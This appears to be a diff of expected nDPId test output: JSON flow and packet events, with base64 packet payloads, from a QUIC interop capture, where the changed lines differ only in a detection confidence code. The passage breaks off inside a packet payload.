02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1603816434659,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434659,"pkt":"pJGxgjQ5PKn0qB\/sht1gA8OgBNgRQCABCwcKydWupNP+R2kegH0mBkcAABAAAAAAAABoFggmtREBuwTYsN\/CCgoKCgj6DPHJWWs8sAAARL55hiYulShwyIvWIzeLs9lbgr6rmw2K6C37PVfcJZDvZCsi+yJ6TesBrbkUmHPBfXK2VSsq+4q1cI5h2aHxdCKt9ff4StlBulmgH+Bx3V5qJpzO+chyDdznTZrYqtjC6v8ZBmqg6a0NWZctg5sOGc0dmWqWQt\/s1k80Opf4xkQymFAPA9Pl4JS9+iEpGVBaepowwgfscg0eVp\/g4KhRhi2KxzLJD4JVToYgB90k\/XMf5w3IY1+ur6LCGNOvp5CgM1wSVcjlTXRfF2sQ8Nt5yAOXsMdlE2VREtX+yKxHSfWv2qqrbcbq6RVZYdc+ds1nkWyZ\/6jdHbCssoBrfhArvTqJ3nXGeMUG+bKJ8FrC+4G2Lxo3r7Ru71nKnVeUZu9UYw31AJEBbUWJ15R3KR8bSsgXVEA1WA99CJtgXyQXqZETvNqqmNWotKljKjV7OgVyrLmK286tZpqcji\/W3bv\/Ubygl\/yKnAKUAdc0UtIijMu
1BloVA+m4PWftVJgbHf3aNTI+rX\/vVy3nXb0QxfA9y88X4009Gs60l0v0MkyueqKT84n5UNIPGZG6kKOK4w37tFYHam4lcYFhUTipTGlChqgi7Rf4rTS7tAG+8PbEvTqHal3HPtJlWvTM+HbREgYOOX+JhiQqeFaskCeQtAFZK2PQl21O\/xEnuuZnwPjd1JkjtwZsem8bzkoeN4610EXK0Ys8ust+NXwAs0bP\/var5LJYH9Np4yVLvPxPvG8XuijcEgZh9Ws\/PfZ9C625UJ6lCdqn5BKdsrwhiY3rVJi0Gb3BXOKIhsyD2r8TfRwv9Zq4BaDAYzj42tlUE3f\/S15wR2pPt+JBRpoPkMMI+gDAQhJn8p8DcnyFkIppSWC9eOywndfHU5\/yUdNXRQwe9qMMJPyoMAFljWxrTTkdBf9XHdyCG0LJ82SE2TMNyUEKoTvtO+s6V45sw4+vLlhHFWzUFy2TDAYLwJNFtU2MgtRT5uCj687n1bMGAYODqCavE72METWdUVuP7KQCk+xmcSAjbR9cQdf0Ld5yf6144baG7pSmrNRAZds9af9ka\/SYB65ZE7zkDGunpr82jyDWS2FNTrKtaVTKmR3FhTiIDLlKPp8T3xukB7\/896wGVPowkyKdVGwn1U7d4smdlgzTqpu88QlyVTsqovLhf+Cl3l01W8nhlUKi7h\/7LgxdSIr\/1gHh5vnSqEyBwm2o1SGij1+TJ05CbhlsZnpgh9DpccxP1I\/Cy1W\/csGNz5P7WukiqEENPTqn7PXD\/3lj2VFKnZ10TEaU4eoOK5Egn7iJWSlbXxC1+uwb2ktJYlIcBWdWgcsSv\/EVRcpOxuacQcBKDfkoJTamdzkoxAEalFWSJMb9d\/CRNa9R8Rgar09wnJqe04d9jL9dUW6cDWYyJSw+MWOP260ZOljLVpA2a1QumvmmIyr8a7jSho4tML+Kc5q0tio8WmChgQRA3uSkUpNwnyEx9DCg96kTZlDeJwu7RwrkaoKlX0GjuohysCaFrtrDI24bZNO8w24oU9Fm+r6MEXXwEQxB0LwQxQFPxdBr0HMioBlCcF10uOji69LTOSZkYvb9+AYrA2jB9gSAJO3UPpzSFaCEJqf9FZw\/TgbQTNNBsw=="} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434659,"flow_last_seen":1603816434659,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434659,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":46353,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434659,"flow_last_seen":1603816434659,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434659,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":46353,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434661,"flow_last_seen":1603816434661,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434661,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":53791,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1603816434661,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434661,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAqp9AAEAR4XjAqAGAKHC\/PNIfEVIE7KqIyQoKCgoIcBuNCNTaAX0AAETSsdkQHvJcN7bcF1ORvnbsKUKjlPXY0qQr5k5uOcDOcZrEKpvgL9RbsKleW8ZMaZNBIcnwq2KO7Ra5INHkVKJRC0TkUHMwFXdKdeaESLl2Sccd706kHiSPpX2Lbm+12fv10onPbU6DngslVSwo5iC2jlneokoStHZ4sxg1C5Je9i6sU3G77ZkPXvlXk0NdQQdexNFkb5jV\/JGW0vFPxDe\/qF9kedjCbIxx+p372PhnBv7iEwZ5Yhty+\/qNKY4yyyzUUwAkAmsK2pn5dzcchowy2PxUUm7hjeS7h+ta9tYiPjGP4k1V5zZKY7Q1iEzKbQmeKLLMluT7Ze6EQ\/94FkLhmXXWckZ88YK2QIDTY12s2\/+YoUrmy0fuxliVJc4e7t5KZxll\/xsK3NXnecJzT\/C9JRu8GZI0MGntc6sD+SVMUDoRX5MmL6JI3Lgrth1lbQy1hnltXa2ICmJpXg4UGGlDL1Pjydtfs82r+A5HZhHO8I+yeL60lJGO\/pmXurcvVllxGtQGjKy0Qx8L\/+0\/h97ODK4A9BOM8c5uVRJZi+ae5YWCQBxdqswC\/na2\/hdsvvl7+jK\/hb5lcLu18N2HToRBmI2OttnAnni74F8psk6eNPlA1WXh4QFnhdp7k1TRWG82dah5Np6uhn0FWu8spp+GpOz1PstbpUlg7HUDKDRocRvdo+XzWoapXRLt2rZBMpFM5+qBvFVKX6Ap5vpKqXx1vyTZc7a1PZSOkBPGsuBfMn\/e6CFzZ\/7SKPFuN1FEHhp6qVSfqkNu+E65oEYHbyp1GfsjmuOEnOWm9QuYUWXPMO\/ZpslsQLq28PkTI45zSR3jBaqY+U4cAU8hHI7Y40pZi0OVHAUG3Cp6mgeeNysES80m0WoJn1e6vRigeA1nc\/I4X7I+sPdNk2rBF6nEfBWEHw7MllB3iWKvvfivqsRWGfnLPVIWWdgqIoeFXHZ0RtFAK+dhBCktFzDp\/q6hAfIktX3z+sj5E4pGLpkcvClK3JUCXIBwpBXNz\/Kc9u134cEFWcWfbtjt65orTzu8PxGQYP+2jYE6lnk\/tcEolSkAelGkBK\/fE95QONEIEfiGb2tudRlXWTXRf\/FFFuldF0FdSJr50n\/Ih08O2ebAjk8ljjBC4Vr56KppkjdyyoUri8YzcV36sbFJqSwNQqsETWwcWH3GRqKMaQ+n+GVJUfR2mVE\/e4E852F32tsINiUu9KMW+toNgqOQfW3axNf6JaPFYtyy7MrNLsqhd2DTcip3+w6pKInaMiPiiKc8Fs2riJwto+W7a3bpQaoELeNUhEukCZCq\/FzN9PqVxk6EFWsqUSSSGklINGSbIS8sc+UAhevcQz0048wkjFBmEZFqu5A\/ObrRfWUEjpP8hKYzq9fOtRsoabYuH0GT29NVVZ6mp6+ZCCS2cAvfDT18d5ydh7ws+klcqRStiKM5PnIuDiY9ahp4jcvj\/XCvOWH28khmORKIgTIM5tVtnApY5TcVPqz7Uqmg2
PcjSYyRBrJch\/eSfjOrA\/cCMqhxLApIy5m9eIL4iY+YzrKwVPTBJ1t2v4mujsR71BWWVXgie2CQjixGfOz6PTiXloHY0ohyCpxw0Cg0ysy1PcwnMPh+3oGN+0IKbU7LLyLHzUsIyN44wigmXzAl6Q=="} -01001{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434661,"flow_last_seen":1603816434661,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434661,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":53791,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01001{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434661,"flow_last_seen":1603816434661,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434661,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":53791,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": 
{"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434664,"flow_last_seen":1603816434664,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434664,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59515,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1603816434664,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434664,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA4mFAAEARxULAqAGAwb4KYuh7EVIE7MZSwQoKCgoIhDOd38iF14kAAETS+DrcKxcR6weCAMpXP0WCjIu9ZBcpWi0OIwLjGToed\/giv9qrtDo9ivnhToDBOwIFut7lx8oGofCTHgF7Bu0VwbCafc3NxbT0fVzbuULC9eYaVRWQHPCUD3HNkinLSEKLzkqEotl3g646wEpRi\/ugoezcuEqO2y6FIB5R6lgny7Nkkc+zMDGl\/vVsq9D4yR\/HW1d+8htwfQLJRpA9hzqrxRXBKybzFVVjhg+KSz67S75CNguDyG4FD4d5JXshyl\/M4INjh32wAMrYFGa8t+2d68fOM2TsdLASGnjmnLNA7\/Pf8UMA6n7BdmW2IJneYpplOs2JDLXzJklKXNuJdllZWQX88VAVkIZdlhRUIxXv\/f7UmxqAgBcsb65UxpALzeD9UOYFX7eXnFX3CBNctLx4OV4vy5qTojgYXWndnvZWDyo9r1nMBp8D6VlFL3WOfCfGoqwqeHusn5C43hBSHrku\/bXz9iJXIhkW2exazvoHN691IPr0B73C3NnmhicLFxNH7FU7WO\/4IL+6sD9DZXTIjSg6oTpPZcbUD6nL7y5Da7hPow3PhI\/sdvRXmbzab8jO1EGiZZHwGfa4q6m9yRM\/TXA5uhhLvU2EfXT91420relOj408ZVI6EUSGceNLMighOPfPAfp0WOhbMCbd98H61M55hJNktUMuazO1d0gcsWhNN7ihq3R6vEE9ycG3wWK4AZXs7o
9pNpiOjFyi\/1mC6Ku8u1sBA1oNJJOJnGURm0YtMoufHAuKV2LJVu2OeQAP\/A2\/w5vSvzrQLOGEBdMHP3rIjZlGA4ez8O3T8wl88X4DTz9tphYgqFCKVqs8At9jd7jId653CvC+xEYdEiNG9bQtgVNzXeRz5DgAY\/Rramv\/s0Mz9eqNUZ5kDg4J0SUVs70edYwUxeTQM\/DGMsrfTyMpxJinyaJ+lIbkswjz4fLDe6hTAtCperVOSIVU7PFEEJNopz\/TdPDhB\/\/OU+mjuGnm9dVJqiOBsKq6hwakuMJMeEbqZ4oR6\/2tTEOQMV7c3m8hAgBlfCT+et0oHj0In1XsO41lgeBhcmsxfgpL0+MgrRWpX3hNlmOw2YFL7IPahaVoqqwt+hlD2GAaUYWeZHKQIID8JZod24qH7\/lYJ76jofC+JdWXEJ7R4KLVHjma\/RdasqECMSrg4m7keaHTZDKrBR35ahliIHV+sND3+6E5IN\/2QdoUlOi4\/UYlyycPYl2QrEjCc4E8TPnrA7HhR8cbOqvr2NJUiO3vmvNIk9u905r1d+yKr0KSvjEMW4aoGs1cnkqp7BFwfwUFTFXE57dIo29rq+a60tDyag9gqUpuo7QsXjOi2fVAkTyRGrjCd9eSs5MDoGygOvvn\/yw4ZAA3XpTxroAMLQ9Sj\/92T0qxoDCFA5OG7E8A7GbyiO5B2nEiMAOZpw+5PZXL4BrU03Z37oc83D+zHRg9XCBGkB3eyfyP2\/ya8kSOgnWI5DRzDtrL+axTWaV4naIX3w78wYegwyfuMaorTISN4Ye+UzmrsF4ld5d7Pp68ZmvyPCebtO\/KSElf\/sucwWTuBzbcyui8aFCG0Vq9OlG0\/qaPlP1qL9A8E8F37BOHLRzvh\/sbn8ks0BPPWFNRGNxMVhkFaWjx9NYOtOhnexATQq7v4e\/jeA=="} -01006{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434664,"flow_last_seen":1603816434664,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434664,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59515,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+01006{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434664,"flow_last_seen":1603816434664,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434664,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59515,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00648{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":49788,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1603816434670,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434670,"pkt":"pJGxgjQ5PKn0qB\/sht1gANDQBNgRQCABCwcKydWupNP+R2kegH0gAUgAeBcBAb52Tv\/+BGMdwnwRUgTYPWHACgoKCggiwZ0u09kvJQAARL77XjijFoQtvpL+zAbPeN0VMZAH77o2Zf3Z\/VxyA9MhcBb1aoo2HyDxw4AGg1rpwYEvZC1KOFbHEvRCy\/7Qr78EUwCK7jfp3PwwAQqSqWeygMwdmPiD9xsvVeM\/Lg3sKV5Yt9sS6nVuVMVaAANebK6ODqzmbz6o3JQ8SCforD0NMCEzwS4zB3SuPu96Zlh707dBA4O8O9hnahrfzpYrma3GTkWvQNZm+MZwybX+ZiPVsaHNWO4eC2QTnSZ5AQr9jvuvVHtv4xtMgtNapGHmqllBavgaXk+UI6hfTQM2FE1B5tGaz6wpXpW9q4R\/XybVurW6TyGaQAE6Rv1VcNFUQkd3osuzBpTRgRd9uQPLk9nYNE1PNSuiR91fTDaJoLkRppS+gpYwkOZenhVm6gOiHF4bfs5ERt4YlwEn2Dp0u5C5nrVVxtfjnYJ5IwT7hUHyh6h9suifUimgbbxzIaysmGlD4k2fx9pmDLHsUHTce4UJVqFY73JtMr6k+yW4T+WXDKoYMXAeEnYYUrI05RCVc4XXpAwD9xw2VGUTFNaUBIeHo7WcMaqEEgdPOnluAhzJsgCW+N8o0F4I+kCQseYCSboaFjLBLNq0zPRus1FaJ\/zpb0BAxHAiXlVn\/igRt26xRMAbTnTk5GPW7C6QEex76kpaaQ7HDdZHqKpOAkSMflF7jIP40HYHAQatrIYPmDQgSWfN880GBmzH9sYEwnjgxWDiL0+toa5E6wd7EQeR8y5+\/Dc5Uzh6tsLpKuR7N9HU++dqYI\/gOtoO809QFWpju+r6P3XwUeBL1ZT0bLR4yPGw3dekRK+qnie3Kqo5b7bYJauiDOWg\/Y4N7gkZK+lB7oklk5ykDxrBCjJgZkBXy3ps5MBGX6YeIhFLnieceXGOD5JF1MA85KdmciDwctd24umJ8IcaHVflsn7+7ZNAlehJDPmcAPO2TlEPY4\/yHOBUFJG7kAZebLJ+uJFdZdWkSaRi1YFo0sxbTkoNNpO6Hu+zAAN0IAy5sYg\/mLzAclK2KdqEZerl\/B5NatrR\/cF5OTxG9p02zemz7BknqKEgbaBN+IFnswhrUXlOTz5kf7R\/m8wKuhLc\/igh6Ij3ng6sR8vbemM2AfCHREP8MbsPro6xc5aF3dAmmWkn13MUXrpl0LTzZdwzZdq7FodGh9dDjxRcZYM1N8++Se9XsHKEp6uPV\/JaA3s2p5q4ZevQE2LX20v4OvqdVF0MMSV+4OZz6eMTL82DKbZc3CST1ORXADs6BAjz6it9rKE2XOBrS5gDnpCiRLCFudHLSBlymJbI0g2CwumFP5vBO4Zn9qFD7JxrpYjBkMOpt21xD\/BtOBNga1EAbpK91wtD+ubtYSnpbhN0OrJGtHIFjpiwh6Xlp1yrbCWvXV5CMDi7VuMCY6X2f\/duWafjiHD8aUvnVKBJpAoeqDFPimiegbb28SnwJ5uYauvYPhvY3ErcbIeR0f\/m1a1DdBjB
1WQmp0Fu4clnTkNaqlT5MCeG\/48z1ijZB7ZQmAcaHRGOM2gO6JTlbbBnQAYR\/DVuXyM\/B5q+uHxWP5bTLYV9915QZrJqVKV0Gf0oQ8wUAFGHwVAmWeVHB64hlXfKeooZTyi+7AZWKi3\/lA=="} -01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":49788,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":49788,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00648{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":46242,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1603816434670,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434670,"pkt":"pJGxgjQ5PKn0qB\/sht1gBxOBBNgRQCABCwcKydWupNP+R2kegH0mAB8YIxDSMFEDfZ59dTdPtKIBuwTYLLrDCgoKCgiO5tu+VRPaUgAARL67x5+yoY3pY0MJItv\/fgrN1Aqjc+LGtbVLhqvz564YTYsK8b+1F2va9jRV8nEV+5OOHqmqaHlOCYYabeXxngu7jBV+i2zDD5mXOeNwP0vYEvtnoouvzEl7eLb5EE0+MuDiJt84m7jpfeD9j3nru+ZcUw2gN2lqFsUahOHFHxiiMRzquZrGDqevIu7WfSfXXUaDgMbSDA6CvWRjCP72DFgLsQ\/11QQP633nQ0SLKipyJqDr4JvqJmirsRRFK4Y2O1d4rwaWvjBQJbZEvrKGBhUisRe4vJCgt83q62hhhVwI+BmOHGZwcH1NeIw9OfXzIkzF9MfEbO7hX8+HXuUKtpvyJorRIV9+dNth0bRPExaC9oZ6eQgb4KnoyGQunWwMuV7XDIWVGPpUovXJ6L3rc7vDqV0O33okP\/XwzTuMfNCRModoaAMilI37jOSGD70L7Ukxtnkod00xzN\/rRqaOySSScNetQaqN\/b8SumEm0AclR2UEqVCZ\/oFDQW3dlFzOPiolM3TYJHmvPtQ07FoMBnxweA07DzM\/nlIehmUnkDIdfazZlo2
WaXyT4kUCXiWSLkyBIKG6OPjGqxQRCjx7pyzScO\/zoIapRT5uA7FxkYfHjnUDRA4N+uhKsfgAHpDGOcVNfY46rti9HRBS+MLjtON8leaOxJHim+wQ0EeQlwbDu7H0Zej1LnLoFqMDWvyz+oUpsvxNgc\/S6MeDK9+JJrebwrhDc+tkmOK548PY4XvYXrqaTGIAivVpHbXZ3zU4Se3IsLa2rpf9EZv0u9D4VcFJRqv2B5CpAl42JhgNb9SlY4QjX\/zYb6IVVivP8oR+boam1SbalhEukEzoSf5vlgVVBVsupKLEgg8QJ4aPvxMTspsMlgkwzLYOK4L5ecOdzbax+0i5aGOmAs30VE0cR4zt2Dxp0GDF2dDg\/9qdw\/BFFFjufPPrjL58CEC5anG+0PnjLNiz99f9A5oIivUVqwWvAEBh3kOUatfc99UXPxAS5VMTgfEOgcxECNa+3dG45igyiOYw0SklHmGfzdommYyu2F0JXKQZKPR4P7uTdH4l9rTKALyu5hrveJCLxlBPzHhp5XxWlFHpXE7yqKl6JoqWNO9m4KnOkD1SiE0BK4iBcHTagyf\/j7KuNtCJQUEjQ59\/x7ZF1iPKFPPyQ+DFZfS4ZMMJAdRuce7PfZ2jZfkuletLSo94qexc6EAps2f0\/fcQwBTkA1Pa7cpknrlPE6nDQwDmYjfxjl2FPTHYb04B\/4LG+OuYH1R8tH+E5cKey0fYaMhnlyRtm7l4zhxXh88eVjpaZDsIoW7JAZhBUfEztlZ0AOc8r\/vP+qFhB8f0D7eEfpR8bO8\/EgtwQtTbuBaw0z2uWUEDIaafMNhsQ1f4mmfFO2liKZH6G6GRfv99KKrH35jUxqsjJeBwQM\/EJ113jCKlIApAONDGVtmrUbUM7eAMD4